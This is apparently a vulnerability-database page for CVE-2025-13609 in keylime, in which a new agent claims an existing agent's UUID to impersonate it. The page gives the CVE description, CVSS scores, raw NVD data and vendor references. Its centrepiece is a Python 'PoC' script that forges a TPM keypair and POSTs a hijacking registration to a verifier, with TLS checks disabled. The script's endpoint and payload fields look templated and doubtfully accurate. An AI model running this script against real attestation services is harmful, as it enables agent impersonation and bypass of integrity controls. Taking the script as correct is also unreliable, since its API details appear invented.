Security Vulnerability Report
中文
CVE-2025-13609 CVSS 8.2 HIGH

CVE-2025-13609

Published: 2025-11-24 18:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

keylime < 6.5.3
keylime < 6.6.2
keylime < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13609 PoC - Keylime UUID Impersonation Attack # This PoC demonstrates the UUID hijacking vulnerability in keylime agent registration import requests import json import hashlib from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.backends import default_backend TARGET_KEYLIME_VERIFIER = "https://keylime-verifier.example.com:8881" TARGET_UUID = "legitimate-agent-uuid-to-hijack" ATTACKER_IP = "attacker-controlled-ip" def generate_fake_tpm_keypair(): """Generate a fake TPM keypair for the attack""" private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) public_key = private_key.public_key() return private_key, public_key def create_malicious_registration_request(uuid, public_key): """Create malicious agent registration request""" pub_key_pem = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ) pub_key_hash = hashlib.sha256(pub_key_pem).hexdigest() registration_payload = { "v": "1.0", "ip": ATTACKER_IP, "port": 9002, "uuid": uuid, "aik_sha256": pub_key_hash, "aips": ["127.0.0.1"], "mb_refquote": "fake_quote_data", "quote_signature": "fake_signature" } return registration_payload def exploit_uuid_hijacking(target_verifier, target_uuid): """ Exploit keylime UUID hijacking vulnerability Attack: Register with different TPM but claim existing UUID """ print(f"[*] Starting UUID hijacking attack on {target_uuid}") # Step 1: Generate fake TPM keypair print("[*] Generating fake TPM keypair...") priv_key, pub_key = generate_fake_tpm_keypair() # Step 2: Create malicious registration request print("[*] Crafting malicious registration request...") payload = create_malicious_registration_request(target_uuid, pub_key) # Step 3: Send registration request (overwrites legitimate agent) print("[*] Sending registration request to overwrite UUID...") try: response = requests.post( f"{target_verifier}/agents", json=payload, headers={"Content-Type": "application/json"}, verify=False, timeout=10 ) if response.status_code in [200, 201, 202]: print("[+] SUCCESS: UUID hijacked! Attacker now controls the agent identity") print(f"[*] Attacker can now impersonate {target_uuid}") return True else: print(f"[-] Registration failed: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": exploit_uuid_hijacking(TARGET_KEYLIME_VERIFIER, TARGET_UUID)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13609", "sourceIdentifier": "[email protected]", "published": "2025-11-24T18:15:49.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in keylime where an attacker can exploit this flaw by registering a new agent using a different Trusted Platform Module (TPM) device but claiming an existing agent's unique identifier (UUID). This action overwrites the legitimate agent's identity, enabling the attacker to impersonate the compromised agent and potentially bypass security controls."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:L", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-694"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:23201", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23210", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23628", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23735", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:23852", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0429", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-13609", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2416761", "source": "[email protected]"}, {"url": "https://github.com/keylime/keylime/issues/1820", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.